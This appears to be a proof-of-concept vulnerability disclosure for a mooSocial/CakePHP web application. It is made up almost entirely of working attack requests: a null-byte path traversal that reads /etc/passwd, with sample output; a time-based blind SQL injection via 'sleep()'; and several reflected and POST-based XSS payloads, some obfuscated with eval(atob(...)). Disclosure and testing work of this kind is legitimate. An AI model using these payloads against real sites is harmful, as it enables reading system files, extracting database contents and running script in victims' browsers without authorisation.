+------------------+
| PROOF OF CONCEPT |
+------------------+

http://www.example.com/pages/../../../../../../../../../../etc/passwd%00

Requet Headers :

GET /pages/../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; 
x64; Trident/5.0)
Connection: close


Response Headers :

HTTP/1.1 404 Not Found
Date: Thu, 22 Aug 2013 04:56:29 GMT
Server: Apache
Set-Cookie: CAKEPHP=r7t684gq0po1spmqpp5634p2l3; expires=Thu, 22-Aug-2013 
05:26:29 GMT; path=/
Content-Length: 37338
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

Response Raw :

//source code of the page 

.........................

root:x:0:0::/ramdisk/root:/ramdisk/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync

........................


+--------------------------------+
| Time-Based Blind Injection     |
+--------------------------------+


http://www.example.com/blogs/view/{Inject here}

 
Real exploitation :
 
http://www.example.com/blogs/view/1 and sleep(2)
 
==> will pause for 2 seconds and diplay the page after
 
http://www.example.com/blogs/view/1 and sleep(10)
==> will pause for 10 seconds and diplay the page after

+-----+
| XSS |
+-----+

//all XSS tested on Mozila Firefox


http://www.example.com/tags/view/"><img src="a" 
onerror='eval(atob("cHJvbXB0KDEpOw=="))'

http://www.example.com/albums/ajax_browse/"><img src="a" 
onerror='eval(atob("cHJvbXB0KDEpOw=="))'


http://www.example.com/blogs/ajax_browse/"><img src="a" 
onerror='eval(atob("cHJvbXB0KDEpOw=="))'


http://www.example.com/topics/ajax_browse/"><img src="a" 
onerror='eval(atob("cHJvbXB0KDEpOw=="))'


http://www.example.com/groups/ajax_browse/"><img src="a" 
onerror='eval(atob("cHJvbXB0KDEpOw=="))'


http://www.example.com/videos/ajax_browse/"><img src="a" 
onerror='eval(atob("cHJvbXB0KDEpOw=="))'

//The input is reflected inside <script> tag between single quotes

http://www.example.com/groups/view/10/video_id:'';!--'<XSS>=&{()}
http://www.example.com/groups/view/10/topic_id:'';!--'<XSS>=&{()}



XSS via Post method :

POST /videos/ajax_embed HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Cookie: CAKEPHP=u3e5q7ut90nhcg7ao1e9c8tni4; 
mooSocial[language]=Q2FrZQ%3D%3D.9%2F79; 
mooSocial[theme]=Q2FrZQ%3D%3D.%2FvHjC2hN; 
mooSocial[activity_feed]=Q2FrZQ%3D%3D.9%2Bb%2FFmVNBY8%3D
Host: www.example.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; 
Trident/5.0)
Accept: */*

source=youtube&source_id=" onmouseover=prompt(976681) bad="

